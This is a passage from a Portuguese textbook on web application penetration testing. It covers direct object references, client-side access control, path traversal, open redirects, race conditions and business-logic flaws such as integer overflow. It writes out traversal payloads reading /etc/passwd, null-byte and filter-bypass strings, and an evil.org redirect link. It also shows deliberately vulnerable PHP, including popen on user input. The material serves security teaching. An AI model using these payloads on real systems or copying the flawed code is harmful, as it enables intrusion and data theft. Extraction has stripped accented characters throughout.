Considere-se, por exemplo, uma aplicao que permite que um usurio autenticado leia as
mensagens enviadas a ele, conforme ilustrado na Figura 8.3.
373
(a) (b) Figura 8.3
Inspecionando os links para as mensagens do usurio esruser, obtm-se as seguintes URLs: Exemplo de apli-
cao vulnervel
a acesso direto a
http://bssac.esr.rnp.br/view.php?mid=1 objetos: (a) Mensa-
gens de esruser.
http://bssac.esr.rnp.br/view.php?mid=2 (b) Mensagens
de admin.
Repetindo o processo para o usurio admin, chega-se ao seguinte resultado:
http://bssac.esr.rnp.br/view.php?mid=4
Observe que cada mensagem acessada invocando-se o script view.php, com um valor
diferente para o parmetro mid. O fato de os conjuntos serem disjuntos um bom
indicativo de que um mapa indireto, especfico para cada usurio, no empregado, para
mascarar o valor da chave de cada registro. Desse modo, para ler as mensagens de outros
usurios, o atacante apenas precisa alterar o valor do ndice de acess, enquanto estiver
autenticado. Esse defeito, por mais simples que seja, afetou a grande maioria das primeiras
verses de sistemas de correio eletrnico via web.
O roteiro abaixo pode ser empregad, para detectar a presena desta vulnerabilidade em
uma aplicao:
1. Se diversas contas de usurio, com diferentes perfis, estiverem disponveis para o teste:
1.1.Autentique-se na aplicao com cada uma das contas e percorra as diversas pginas
que a compem.
1.2.Anote todos os itens de entrada que paream ser chaves primrias de registros ou
identificadores de objetos e os respectivos valores.
1.3.Com cada conta, tente acessar os objetos de outra, alterando o valor do parmetro,
de acordo com o encontrado no passo anterior.
2. Se no, se somente uma conta estiver disponvel para o teste:
2.1.Autentique-se na aplicao e percorra as diversas pginas que a compem.
2.2.Anote todos os itens de entrada que paream ser chaves primrias de registros ou
identificadores de objetos e os respectivos valores.
374
2.3.Verifique se h algum padro que pode ser identificado nos valores de cada par-
metro encontrado no passo anterior.
2.4.Gere novos valores, de acordo com o Passo 2.3, e os utilize nos parmetros asso-
ciados, para realizar requisies aplicao.
Acesso direto a recursos estticos

Uma variao do ataque discutido na seo anterior consiste em acessar diretamente q
recursos estticos, presentes no servidor. O problema se manifesta quando o sistema
disponibiliza links diretos para objetos, sem uma camada de cdigo que faa o papel
de monitor de referncias. Com isso, o servidor web atende as requisies, sem impor
nenhuma restrio, supondo que o controle de acesso nativo no esteja habilitado para
o diretrio em que esto os recursos.
Esse cenrio ocorre frequentemente em stios web de eventos, que disponibilizam aos parti-
cipantes todos os materiais das diversas apresentaes realizadas. Para exibir a pgina que
lista esses contedos, o usurio precisa estar autenticado, porm, para obter os arquivos,
no. A premissa adotada incorretamente, nesse caso, resume-se em assumir que somente
usurios legtimos so capazes de obter os nomes dos recursos fornecidos.
A aplicao ilustrada na Figura 8.4 exemplifica a vulnerabilidade supracitada. Observe na

barra de estado do navegador web que o arquivo ls.txt obtido diretamente a partir do
diretrio files do servidor. Embora o usurio esruser, por meio da interface do sistema,
somente tenha visibilidade de trs arquivos, ele pode inferir a existncia de outros mais. No
exemplo, fica claro que cada recurso tem o nome de um comando do sistema operacional
Linux, e, assim, natural assumir a presena de arquivos como ps.txt e echo.txt. Para
complementar, considere-se novamente o caso de pgina de evento e que os nomes de
arquivos sigam um padro como <sobrenome>.<nome>.pdf, com base em cada pales-
trante. Neste cenrio, basta obter alguns dos arquivo, para compreender a lgica de nomes
adotada e conseguir o conjunto completo, diretamente do servidor.
Figura 8.4
Aplicao que per-
mite acesso direto a
recursos estticos.
A deteco do problema descrito muito simples e ocorre nas fases de reconhecimento

e mapeamento da aplicao, quando os recursos fornecidos de maneira esttica podem
ser enumerados pelo analista de segurana. Qualquer um desses itens, que necessite ser
acessvel somente a usurios autorizados, deve ser indicado no relatrio como vulnervel a
acesso no controlado.
375
Aplicaes vulnerveis
Cite exemplos de recursos que podem ser acessados diretamente em uma aplicao vulnervel.
Controle de acesso no lado cliente da aplicao

Controles de segurana que so executados no lado cliente da aplicao so ineficazes, q
pois o usurio tem poder total sobre o que ocorre em seu ambiente. Apesar desse fato,
diversas aplicaes reais acabam sendo desenvolvidas com essa abordagem, o que as
torna completamente vulnerveis a usurios maliciosos.
Alguns exemplos de defeitos desse tipo, que so abordados neste texto, incluem meca-
nismos de autorizao, manuteno de perfil e proteo de referncias a objetos.
Autorizao no lado cliente da aplicao

Para discutir esse problema, considere-se uma aplicao que, aps a autenticao do
usurio, exibe a mesma lista de funcionalidades a todos, mas que controla o acesso a elas Matriz de controle
por meio de cdigo Javascript, com base em uma matriz de controle de acesso obtida do de acesso
servidor. Seja cada link definido de maneira similar ilustrada abaixo: Tabela que indica
as aes que cada
indivduo do ambiente
<a href=dummy.php id=1 onclick=return changeURL(1)> pode realizar sobre
cada objeto existente.
Caixa de mensagens</a>
Observe-se que a URL definida especifica um recurso invlido do servidor e ela ajustada
por meio da funo changeURL(), que invocada quando o link clicado. O cdigo
Javascript que realiza o controle de acesso pode ser visto na Figura 8.5:
<script>
var acm = [0,0,0,0,0];
acm[0] = 1;
function changeURL(id){
if (acm[id-1] != 1) {
alert(Voc no tem autorizao para acessar esta opo!!!);
return false;
document.getElementById(id).href=acao+id+.php;
return true; Figura 8.5

Cdigo Javascript
} que responsvel
pelo processo de
</script> autorizao.
376
A varivel acm constitui a matriz de controle de acesso e definida pelo servidor, de
acordo com o perfil do usurio autenticado. O acesso do usurio s permitido se a posio
do vetor associada ao link contiver o valor um. Note-se que a URL, construda dinamica-
mente, relativa e tem o formato acao<id>.php, sendo que <id> corresponde ao valor
passado no manipulador de evento onclick de cada link. A mesma anlise feita aqui
poderia ter sido realizada por um usurio malicioso, para descoberta das URLs dos diversos
recursos da aplicao. Em seguida, bastaria efetuar as requisies diretamente pelo nave-
gador web, contornando, assim, o controle de acesso provido pelo Javascript embutido.
Esse tipo de vulnerabilidade normalmente encontrado, em um teste de invaso, na q

etapa de mapeamento, durante a anlise dos diversos scripts fornecidos pela aplicao.
Qualquer item que manipule links ou que exiba mensagens de erro referentes a controle
de acesso deve ser inspecionado com mais ateno, pelo analista de segurana.
Manuteno de perfil no lado cliente da aplicao

Quaisquer informaes relacionadas aos processos de autenticao e de autorizao q
devem, de acordo com as melhores prticas de segurana, ser armazenadas como parte
do estado de cada sesso, no lado servidor da aplicao.
O propsito disso evitar que usurios maliciosos tenham a chance de manipular esses
dados e, com isso, comprometer os mecanismos de controle de acesso, realizando
ataques como escalada de privilgios e contorno de autenticao, por exemplo.
Infelizmente, muitos so os sistemas reais que no respeitam essa regra e fazem o con-
trrio, na maioria das vezes, devido adoo indevida de um mecanismo de gerencia-
mento de sesses de origem caseira.
Observe-se, como exemplo, a aplicao ilustrada na Figura 8.6 e note-se que a URL do link
para a caixa de mensagens inclui um parmetro uid com valor esruser (vide barra de
estado). Isso um grande indicativo de que o sistema mantm o estado da sesso, ou parte
dele, no lado cliente da soluo. Quando algo assim encontrado, um atacante pode alterar
o valor do parmetro e enviar a requisio, para ver se consegue um acesso mais privile-
giado. Nesse cenrio, alguns identificadores que podem ser testados incluem admin e

root, pois eles so comumente utilizados em ambientes de produo.
Figura 8.6
Aplicao que
mantm perfil no
lado cliente.
377
Em alguns casos, um parmetro booleano, utilizado para indicar um perfil administrativo,
adicionado s requisies, sempre que o usurio autenticado for privilegiado. Essa prtica
segue a estratgia de segurana por obscuridade, a qual gera uma falsa sensao de pro-
teo. Mesmo que usurios comuns no saibam da existncia do parmetro, h diversos
caminhos que levam sua descoberta. Ademais, dada a frequncia com que empregado,
natural tentar submeter variaes como adm=Y, adm=S, admin=Y, admin=S, root=Y
e root=S, como parte da requisio. Muitas vezes, esse tipo de verificao coroado com
uma escalada vertical, para uma conta com o mximo de privilgios.
Os cenrios vistos nesta seo apenas reforam a ineficcia de se adotar qualquer controle
de seguran, no lado cliente da aplicao. Assim, sempre que situaes similares forem
detectadas em um teste de invaso, elas devem ser devidamente reportadas.
Proteo de referncias a objetos

Com o intuito de evitar ataques de acesso direto a objetos, diversos mecanismos foram q
criados e adotados no passado, porm, alguns deles continuaram sendo vulnerveis,
porque no deixaram de expor a real identidade do objeto, de uma maneira ou de outra.
A premissa adotada, de modo geral, era de que a causa raiz do problema se encon-
trava na exposio direta de uma chave ou nome de um elemento interno da aplicao.
Embora isto estivesse correto, a soluo de somente ofuscar o identificador e seguir
enviando o resultado para o usurio estava errada, pois o atacante ainda conseguia
inferir as referncias para recursos alheios.
Nos prximos pargrafos, algumas dessas solues ineficazes sero discutidas, com base
no sistema ilustrado na Figura 8.7, que exibe o arquivo, cujo nome especificado em um
parmetro da requisio. Considere-se que a verificao de privilgios ocorre somente na
montagem da tela, na qual so includos links apenas para os recursos que o usurio tem o
direito de acessar. Na verso original da aplicao, quando o atacante descobria os nomes
de outros arquivos, ele podia visualiz-los simplesmente ajustando o valor do parmetro
correspondente. Para impedir esse ataque, os desenvolvedores ofuscaram os nomes dos
arquivos empregando uma srie de tcnicas diferentes, de modo que o usurio malicioso
no pudesse mais construir a requisio.
Nesse exemplo, o link para a RFC 2616 representa o estado original da aplicao, que Figura 8.7
expunha completamente o nome do arquivo na URL: Aplicao que pro-
tege referncias a
objetos de maneira
http://refp.esr.rnp.br/view.php?f=fielding.1999.txt&t=0 insegura.
Note-se que o nome passado a view.phppor meio do parmetro f e aparenta seguir o

formato <autor>.<ano>.txt. A partir desse padro, fica muito fcil acessar outros arquivos
que existem na base, desde que se saiba o autor e a data da publicao.
378
A primeira tentativa de melhoria est ilustrada no link para a RFC 2617, que no faz nada
mais que escrever o nome do arquivo ao contrrio:
http://refp.esr.rnp.br/view.php?f=txt.9991.sknarf&t=1
fcil perceber que o nvel de dificuldade de explorao, nesse caso, continua basicamente
o mesmo que o anterior.
Uma tcnica diferente, utilizada no link para a RFC 2821, resulta em URLs como a seguinte:
http://refp.esr.rnp.br/view.php?f=a2xlbnNpbi4yMDAxLnR4dA==&t=2
Embora isso parea crptico para usurios leigos, profissionais de computao conseguem
identificar facilmente que se trata de codificao em BASE64, a qual coberta no Captulo 9
deste livro. Nesse cenrio, o passo natural de um atacante consiste em decodificar o valor do
parmetro f, a2xlbnNpbi4yMDAxLnR4dA==, e analisar se o resultado, klensin.2001.txt,
faz sentido no escopo da aplicao. Caso isso no ocorresse e a sada fosse uma sequncia
binria de carter aleatrio, poderia ser um indicativo de texto cifrado, o que evitaria a cons-
truo de identificadores para arquivos arbitrrios. Essa situao, contudo, no impediria o
acesso ilegtimo, se fossem conhecidos outros valores para f, uma vez que um monitor de
referncias no implementado.
Finalmente, o ltimo exemplo trata do link para a RFC 959, o qual especifica a URL:
http://refp.esr.rnp.br/view.php?f=706f7374656c2e313938352e747874&t=3
Pelo conjunto de caracteres presentes no valor do parmetro f, fcil observar que se

tratam de dgitos hexadecimais. Analisando com um pouco mais de cuidado, nota-se que
os valores dos dgitos, considerados em pares, so prximos e esto na regio de carac-
teres imprimveis da tabela ASCII. Realizando a converso, obtm-se o nome de arquivo
postel.1985.txt, com o que se conclui que o processo no robusto. Assim como no caso
anterior, o resultado da operao poderia ser uma sequncia aleatria de octetos, quando,
ento, as mesmas consideraes seriam vlidas.

Em todas as solues analisadas, a causa raiz da vulnerabilidade reside no uso de processos
que permitem, facilmente, recuperar o nome real do arquivo, a partir do valor ofuscado
enviado ao usurio. Alm disso, uma vez conhecido o mecanismo de proteo adotado
pela aplicao, o atacante pode forjar requisies para arquivos arbitrrios, pois elas no
dependem de nenhum valor secreto conhecido somente pelo sistema.
Percurso de caminho
Aplicaes que exibem ou escrevem arquivos especificados por usurios podem estar
sujeitas a ataques de percurso de caminho, caso os devidos cuidados no sejam tomados.
A causa raiz do problema consiste em permitir que, alm do nome do arquivo, seja q
tambm informado o local em que ele se encontra, em vez de assumir que esto em um
determinado diretrio.
Em alguns casos, essa premissa adotada por meio de um cdigo como o abaixo, que con-
catena o valor fornecido pelo usurio com o caminho da pasta que deve ser utilizada:
$arquivo = /var/arquivos/.$nome;
379
Um usurio malicioso, porm, pode fornecer um valor como:
../../etc/passwd
O que resulta no caminho /var/arquivos/../../etc/passwd, cujo valor cannico /etc/ Valor cannico
passwd, uma vez que a sequncia .. se refere ao diretrio pai. Corresponde ao
q
formato padronizado
Observe-se que, com esse ataque, possvel acessar qualquer arquivo do ambiente, de uma informao que
pode ser representada
para o qual a conta de sistema operacional da aplicao possua privilgio de leitura.
de mais de uma maneira
Muitas vezes, no possvel saber em que ponto da rvore de diretrios encontra-se diferente.
a pasta base da aplicao e, assim, fica difcil estabelecer quantas ocorrncias de ..
devem ser empregadas. Nesses casos, uma tcnica que pode ser usada para evitar que a
descoberta seja por tentativa e erro, resultando na submisso de mltiplas requisies,
resume-se em enviar uma grande sequncia de ../ seguida do nome de arquivo dese-
jado (Stuttard e Pinto, 2007), como ilustrado a seguir:
../../../../../../../../../../../../etc/passwd
A razo deste mtodo funcionar reside no fato de que alguns sistemas operacionais Figura 8.8
substituem a repetio de ../ pela raiz do sistema de arquivos, quando o percurso passa Percurso de
caminho em Linux
desse ponto. Isso pode ser observado na Figura 8.8 e Figura 8.9, para os sistemas Linux e que passaria da raiz.
Windows, respectivamente.
C:\> cd
C:\
C:\>dir \temp /w
O volume na unidade C no tem nome.
O Nmero de srie do volume 5059-23D3

Pasta de C:\temp
[.] [..] Hash.bat Hash.class

[Security]
2 arquivo(s) 3.020 bytes
3 pasta(s) 132.434.340 bytes disponveis
380
C:\>dir ..\..\..\..\..\..\..\..\temp /w
O nmero de srie do volume 5059-23D3
Pasta de C:\temp
[.] [..] Hash.bat Hash.class [Security]

Figura 8.9
Percurso de 2 arquivo(s) 3.020 bytes
caminho em
Windows que 3 pasta(s) 132.434.340 bytes disponveis
passaria da raiz.
Outra tcnica que pode ser til, para verificar a possvel existncia da vulnerabilidade em
uma aplicao baseada em Windows, consiste em enviar alguns passos de caminho
invlidos, mas cancelados imediatamente por ocorrncias de ../. Se o arquivo especifi-
cado ao fim desse valor for exibido normalmente, h uma boa chance de que o caminho
tenha sido passado sem tratamento para o sistema de arquivos, indicando a presena do
defeito. Um exemplo desse comportamento pode ser visto na Figura 8.10.
C:\>dir /w
Pasta de C:\Temp
[.] [..] Hash.bat Hash.class [Security]

C:\>dir este\caminho\nao\existe\..\..\..\.. /w
Pasta de C:\Temp
Figura 8.10
Percurso por
subdiretrios [.] [..] Hash.bat Hash.class [Security]
inexistentes.
381
Considere-se agora uma aplicao ligeiramente diferente daquela do cenrio original, a qual
adiciona uma extenso de arquivo, como no exemplo a seguir:
$arquivo = /var/arquivos/.$nome..txt;
Se o atacante fornecer a mesma entrada maliciosa, utilizada inicialmente, obtmos o

caminho /var/arquivo/../../etc/passwd.txt, cujo valor cannico /etc/passwd.txt. Clara-
mente, a explorao deixa de funcionar, salvo se for possvel comentar, de alguma maneira,
tudo que aparecer aps o valor introduzido. Uma possibilidade se apresenta quando o nome
de arquivo passado a uma funo em cdigo nativo, que utiliza o caractere nulo para
delimitar o final de uma cadeia de caracteres. Por exemplo, considere-se que o cdigo de
uma aplicao PHP para exibio de arquivos do tipo texto seja o representado na Figura 8.11:
$f=$_GET[f];
$file = files/.$f..txt;
$out = popen(cat .$file, r);
while (!feof($out)) {
echo(fgets($out).<br>);
}
Figura 8.11
pclose($out); Cdigo PHP para
exibio de arquivos
Se o valor passado no parmetro f for terminado com %00, conforme ilustrado:
../../../../../etc/passwd%00
O seguinte comando de sistema operacional executado pela funo popen():
cat files/../../../../../etc/passwd\0.txt
O que faz com que tudo aps passwd seja desconsiderado, resultando na exibio do
arquivo /etc/passwd.
De modo a evitar o ataque de percurso de caminho, alguns desenvolvedores tentam

higienizar a entrada, em uma nica passagem, em vez de simplesmente rejeit-la (Stuttard
e Pinto, 2007). Nesses casos, possvel fornecer as sequncias de caminho dentro delas
mesmas, como se v nos dois exemplos abaixo, para evadir o filtro utilizado pela aplicao:
1 ....//
1 ....\\
382
Por fim, para testar se uma aplicao vulnervel a ataques de percurso de caminho, o
seguinte roteiro pode ser empregado em um teste de invaso:
1.1.Selecione aqueles que parecem fornecer um nome de arquivo.
1.2.Se o nome completo de arquivo especificado, incluindo a extenso:
1.2.1. Submeta o nome de um arquivo que se sabe existir no ambiente, precedido de

uma longa sequncia de ../.
1.2.2. Se o arquivo no for exibido, tente outros candidatos, dependendo da men-

sagem de erro fornecida.
1.2.3. Se no, a aplicao vulnervel a percurso de caminho.
1.3.Se no:
1.3.1. Submeta o nome de um arquivo que se sabe existir no ambiente, precedido de

uma longa sequncia de ../ e finalizado com %00.
1.3.2. Se o arquivo no for exibido, tente outros candidatos, dependendo da men-

sagem de erro fornecida. Pode ser que a evaso com %00 no seja aplicvel e
o teste deva ser encerrado.
1.3.3. Se no, a aplicao vulnervel a percurso de caminho.
Redirecionamento no validado
Redirecionamento uma tcnica que permite instruir o navegador web a carregar outra q
pgina, aps a originalmente requisitada, podendo ser utilizado, por exemplo, para
evitar a quebra de links, quando um recurso movido para um lugar diferente. Embora,
muitas vezes, isso ocorra dentro de um mesmo domnio, tambm possvel realizar o
processo para domnios diferentes.
Em qualquer um dos casos, a barra de endereos do navegador web atualizada, para

refletir a URL do recurso carregado. A implementao do processo de redirecionamento

pode ser realizada tanto no lado do servidor quanto do cliente, com resultados similares.
No primeiro caso, a ideia consiste em devolver ao navegador web uma mensagem com
cdigo de estado 3XX, seguido de um cabealho Location:, especificando a nova URL. Essa
abordagem, que pode ser atendida de maneira programtica ou por meio da configurao
htaccess do arquivo .htaccess, faz com que uma requisio seja efetuada para o novo endereo
Arquivo, aceito por informado. Se o cdigo fornecido for o 301 (Moved Permanently), solicitaes subsequentes
muitos servidores web, para o recurso original so substitudas, pelo prprio navegador web, para a URL fornecida
que permite redefinir
quaisquer itens da no redirecionamento.
configurao principal,
para os diretrios em Do lado cliente, um dos mtodos de redirecionamento envolve o uso dometa-taRefres,
que esteja presente. disponvel na linguagem HTML:
Originalmente, era mais
restrito, tendo apenas
o propsito de definir <meta http-equiv=REFRESH content=3;url=http:// esr.rnp.br/end.php>
privilgios de acesso
por diretrio. Note-se que possvel especificar um intervalo de tempo a ser aguardado, em segundos,
antes que o acesso ao novo endereo seja realizado.
O uso deRefres expressamente desaconselhado pelo W3C, uma vez que pode quebrar
383
a funcionalidade fornecida pelo boto Retornar. Isso acontece porque, ao carregar a pgina
anterior, que contm o marcador em questo, o navegador redireciona o usurio nova-
mente para a pgina especificada, impedindo, assim, o retorno.
Outro mecanismo disponvel no lado cliente do sistema consiste em utilizar cdigo

Javascript, mais especificamente a funo location.replace(), da maneira ilustrada a seguir:
<script language=javascript>
setTimeout(function() {location.replace(http://esr.rnp.br/end.php);
},3000);
</script>
O mtodo location.replace() substitui a pgina atual pela especificada, removendo a

primeira do histrico de navegao. Desse modo, a funcionalidade do boto Retornar pre-
servada, ao contrrio da soluo baseada emRefresh.
Finalizada essa apresentao de tecnologias para redirecionamento, vejamos que pro-

blemas de segurana surgem com o uso incorreto delas. A causa raiz da vulnerabilidade
consiste na utilizao de informaes fornecidas pelo usurio, sem o devido tratamento, na
composio da URL para a qual ele ser direcionado.
Isso pode ser usado por atacantes, para carregar pginas maliciosas, a partir de um q
domnio confivel, de modo a conseguir mais facilmente que vtimas as visitem, do que
se fosse necessrio clicar em links suspeitos.
Por exemplo, considere-se o seguinte trecho de cdigo em PHP:
<?php
header(HTTP/1.1 302 Found);
header(Location: .$_GET[url]);
?>
Supondo que o nome do script seja redir.php, localizado emhttp://esr.rnp.b, um usurio

malicioso poderia fornecer um link como o seguinte a uma potencial vtima:
<a href=http://esr.rnp.br/redir.php?url=http%3A%2F%2Fwww.evil.
org%2F>
Clique e concorra a prmios!!!</a>
O qual, se clicado, causaria um redirecionamento parahttp://www.evil.or, uma vez que o

valor malicioso do parmetro url concatenado ao cabealhoLocatio.
Com o intuito de corrigir o problema, a equipe de desenvolvimento pode incluir o seguinte

filtro, que verifica se a URL contm o nome de domnio esperado:
<?php
if (stripos($_GET[url], http://esr.rnp.br/) === false) {
echo(<h2>Domínio inválido!</h2>);
exit;
384
}
header(Location: .$_GET[url]);
?>
Neste caso, o link anterior no funcionaria, pois referencia um domnio diferente do espe-
rado pela aplicao. Entretanto, a soluo ainda vulnervel, pois fica satisfeita com a pre-
sena dehttp://esr.rnp.br em qualquer ponto do argumento. Graas a isso, uma maneira
de quebrar o mecanismo de proteo envolve a submisso do valor:
http://www.evil.org?u=http://esr.rnp.br/
Outra tentativa de solucionar a vulnerabilidade consiste em adicionar o nome de domnio

correto, como prefixo, ao valor do parmetro fornecido pelo usurio:
<?php
header(Location: http://esr.rnp.br.$_GET[target]);
?>
Note-se, no cdigo acima, que no h uma barra (/) ao final do nome de domnio. Como
seria possvel utilizar a ausncia desse caractere em um ataque? Considerando que o ata-
cante possui controle do servidor de DNS do domnio evil.org, o seguinte valor pode ser
passado para o parmetro target (Stuttard e Pinto, 2007):
.evil.org
Resultando no redirecionamento para o domnioesr.rnp.br.evil.or.
Para finalizar esta seo, os passos que podem ser seguidos em um teste, para detectar este
tipo de vulnerabilidade em aplicaes web, so os seguintes:

1.1.Verifique aqueles que so usados em redirecionamento, tanto no lado cliente, como

no servidor. Neste ltimo caso, isso pode ser feit, observando-se se a resposta
contm um cdigo de estado 3XX.
1.2.Substitua o valor dos itens encontrados, um por vez, pelo nome de um recurso do
servidor que se saiba existir. Se o redirecionamento ocorrer para o elemento esco-
lhido, a aplicao sofre da vulnerabilidade.
1.3.Repita o passo anterior, mas especificando uma URL absoluta para outro domnio.
Se a pgina especificada for carregada, a aplicao tambm pode ser usada para
redirecionamentos externos.
385
Condies de corrida
Condies de corrida so conhecidas h muito tempo (Netzer e Miller, 1992) e ocorrem q
quando processos que so executados concorrentemente manipulam recursos compar-
tilhados, sem o uso de mecanismos de sincronizao.
Como resultado direto deste problema, programas podem apresentar comportamento

inesperado, o qual, na maioria das vezes, difcil de ser reproduzido e depurado.
Para melhor compreender a situao, considere-se o pseudocdigo ilustrado na Figura 8.12,

tendo em mente que a notao [...]BD denota a manipulao de valores em um banco de dados.
01 x = [saldo]BD;
02 if (x >= val) {
03 x = x val;
Figura 8.12
04 [saldo]BD = x; Cdigo sujeito
a condies de
05 } corrida.
Imaginem-se que duas instncias do cdigo, P#1 e P#2, sejam executadas concorrente-
mente, que val inicie, respectivamente, com os valores 70 e 50 e que [saldo]BD contenha o
valor 100. Supondo a fatia de tempo alocada para a execuo de cada processo, um possvel
resultado seria o ilustrado na Figura 8.13. Observe-se que o valor final de [saldo]BD 50, em
vez de 30, que era o esperado da execuo sequencial de P#1 e P#2. Isso acontece porque a
execuo dos processos no atmica e, assim, quando a condio da linha 02 verificada
em cada caso, ainda existe saldo suficiente para a realizao da transferncia.
P#1 P#2
fatia de tempo # linha x val # linha x v [saldo]BD
01 100 70 100
01 02 100 70 100
03 30 70 100
01 100 50 100
02 02 100 50 100
Figura 8.13
03 50 50 100 Resultado da execu-
o concorrente de
03 04 30 70 30 duas instncias do
cdigo da
04 04 50 50 50 Figura 8.12.
Alguns impactos segurana decorrentes de condies de corrida, que podem ser q

citados, incluem a violao de autenticao, a adulterao da lgica de negcio do
sistema e a quebra do mecanismo de autorizao e de outros controles.
Alguns exemplos reais, no escopo de aplicaes web, podem ser encontrados no estudo
realizado por Paleari et al. (2008) sobre o assunto, no qual, tambm, propm tcnicas para
deteco dinmica do problema. Note-se, contudo, que a melhor abordagem para esse fim
ainda consiste na inspeo do cdigo fonte da aplicao.
386
Condies de corrida
O que so condies de corrida?
Vulnerabilidades na lgica de negcio

A camada de lgica de negcio da aplicao responsvel por ligar as camadas de apre- q
sentao e de dados, impondo as regras de negcio aplicveis.
Por exemplo, para realizar o pagamento de um boleto bancrio, o saldo disponvel em conta
somado ao limite concedido pela instituio financeira ao cliente deve ser suficiente, para
cobrir a despesa.
Erros de codificao da regra ou na lgica estabelecida podem resultar em vulnerabili- q

dades, que podem ser exploradas com os mais diversos objetivos.
Neste contexto, a seguinte lista de casos reais apresentada por Grossman (2007):
1 TV interativa telespectadores podiam mandar comentrios, para serem apresentados

como texto em um programa de televiso. De modo a evitar a exibio de contedo no per-
mitido, a produo realizava uma triagem prvia do que poderia ou no ir ao ar. O problema,
porm, era que, depois de realizado esse crivo, o usurio podia realizar quaisquer modifica-
es no texto, sem novas verificaes. Graas a isso, muitas pessoas utilizaram a brech, para
fazer comentrios ofensivos, expor opinies e divulgar produtos e servios, gratuitamente.
1 Mac World 2007 Expo cdigos prioritrios de cinco caracteres podiam ser utilizados, no
processo de registro online, para se conseguir iseno da taxa de inscrio. Devido ao volume
de participantes, para evitar trfego de rede e processamento desnecessrios, uma lista de
hashes dos cdigos vlidos era enviada ao cliente, para verificao local, antes da submisso.
Como apenas letras maisculas e nmeros eram permitidos e devido ao pequeno tamanho,
a construo de um dicionrio que traduzia cdigos para hashes era totalmente factvel, o

qual permitiu que inmeras pessoas participassem gratuitamente do evento.
1 Competio simulada de bolsa de valores o objetivo do desafio era apontar os partici-

pantes com as carteiras mais rentveis, aps dez rodadas de uma semana cada, os quais,
alm de concorrerem a dez mil dlares por vez, poderiam participar da final, que distribua um
prmio de um milho de dlares. O processo de compra de aes no jogo era composto por
dois passos: o primeiro consistia na seleo de papis e especificao de cotas e, o segundo,
na confirmao ou desistncia da transao. As vulnerabilidades apresentadas pelo simulador
resumiam-se em permitir executar a segunda etapa, aps o fechamento dirio do mercado, e
a manter o preo do momento da reserva. Com isso, vrios pedidos podiam ser realizados, ao
longo do dia, mas somente os papis lucrativos seriam confirmados e adicionados carteira.
1 Vinte e um neste jogo de cartas, tambm conhecido por blackjack, ganha aquele cuja
soma das cartas chega mais prximo de vinte e um, sem, contudo, exceder este valor. Cada
uma das figuras (dama, valete e reis) vale dez, o s, um ou onze, conforme for mais conve-
niente, e as demais, o prprio nmero estampado. Nos cassinos, quando a carta aberta da
mesa um s, um seguro opcional deve ser oferecido aos jogadores, para o caso de a outra
carta valer dez. Em uma verso online do jogo, havia um atraso perceptvel na oferta de
segur, sempre que a carta fechada era favorvel mesa. Com essa informao adicional, os
usurios conseguiam aumentar as chances de ganho monetrio.
387
Como possvel observar pelos cenrios apresentados, erros desse tipo decorrem da q
adoo de algumas premissas equivocadas, alm de serem difceis de detectar.
Nas prximas subsees, mais dois exemplos sero discutidos.
Transferncia de valor negativo

Considere-se uma aplicao bancria que permite ao usurio realizar transferncias de
valores entre contas, desde que haja saldo suficiente para a operao. Seja o cdigo respon-
svel por garantir essa regra de negcio o seguinte:
if ($amount > $balanceA) {
$message = $prefix.Valor solicitado é maior que o saldo.;
goto error;
$balanceA = $balanceA - $amount;
$balanceB = $balanceB + $amount;
Observe-se que, se um valor maior que o saldo for solicitado, uma mensagem de erro defi-
nida e nenhuma transferncia realizada. Caso contrrio, o montante subtrado da conta
original ($balanceA) e somado conta destino ($balanceB). Aps realizar diversos testes que
reforaram a correo do caso de uso, a equipe liberou a funcionalidade para produo.
Porm, ataques nunca ocorrem seguindo-se casos documentados, mas, sim, fluxos ines-
perados de execuo. Com isto em mente, o que acontece se o cliente fornecer um valor
negativo para transferncia? Analisando o cdigo, novamente, percebe-se que isso no seria
barrado pelo if, pois qualquer nmero negativo menor que um positivo. Como resultado,
ao contrrio do esperado, o valor creditado conta de origem e debitado da outra. A causa
raiz da vulnerabilidade, neste cenrio, resume-se na validao incorreta de entrada, a qual
no pode ser negativa.
Emprstimo acima do limite

Antes de descrever este cenrio, necessrio relembrar como a representao de
nmeros inteiros em sistemas computacionais. O esquema mais utilizado chamado de
complemento de dois, o qual, considerando-se nmeros de n bits, calcula um valor negativo
x, por meio da frmula 2n x. Como o total de valores que podem ser representados por n
bits sempre par, e um intervalo simtrico de inteiros, devido ao zero, contm um nmero
mpar de elementos, a faixa resultante de representao assimtrica. Por conveno,
adota-se que o lado negativo deve ser sempre o maior, e, assim, nmeros de n bits podem
assumir valores de -2n-1 a 2n-1-1.
Um fato imediato que pode ser constatado que nem sempre o resultado de algumas ope-
raes caber na mesma quantidade de bits. Por exemplo, considere-se n=8, o que permite
representar inteiros de -128 a 127. Neste cenrio, as seguintes expresses ilustram casos
que resultam em valores fora da faixa permitida:
1 100 + 30.
1 -100 - 30.
388
1 -(-128).
1 100 * 2.
1 -128 / -1.
Esta situao, chamada de extravasamento de inteiro, no gera um erro de execuo, mas,

sim, um resultado inconsistente, que acaba introduzindo vulnerabilidades em um sistema.
De modo geral, o valor obtido com essas operaes consiste na representao binria do
inteiro esperado, porm, truncado com n bits.
Figura 8.14 Considere-se, agora, outra aplicao bancria que concede um limite de crdito, para cada
Extravasamento de cliente, e que o emprstimo pode ser feito por meio de uma aplicao web. Para evitar que
inteiro: (a) 100 + 30.
(b) 100 * 2. um valor maior que o permitido seja solicitado, o seguinte trecho de cdigo executado:
(c) 100 * 8.
if (limiteUsado + valorEmprestimo <= limiteMaximo) {
// Concede o emprstimo
valorConta = valorConta + valorEmprestimo;
} else {
// Exibe mensagem de erro
Note-se nesse cenrio que, diferentemente do exemplo da seo anterior, no adianta for-
necer um valor de emprstimo negativo, pois isso resultaria na diminuio do montante em

conta, ao invs do que se quer obter. Por outro lado, se o valor solicitado somado ao limite
j usado for maior que o disponibilizado, a transao impedida e uma mensagem de erro,
exibida. Como um usurio malicioso poderia, ento, subverter o controle instalado?
Para ilustrar o ataque, assuma-se que limiteUsado, valorEmprestimo e limiteMaximo

sejam inteiros de 16 bits, que armazenam, respectivamente, 8000, 0 e 10000, e que valor-
Conta um inteiro de 32 bits, contendo 0. Sabendo do problema de extravasamento de
inteiros, um usurio malicioso pode fornecer, para valorEmprestimo, o nmero 30000, que
extrapola o limite de crdito concedido, mas faz a expresso limiteUsado + valorEmpres-
timo <= limiteMaximo ser avaliada como -27536 <= 10000, ou seja, verdadeira. Isso ocorre
porque nmeros sinalizados de 16 bits no podem representar o valor 38000.
A soluo para o problema consiste em, antes de realizar operaes que possam resultar em
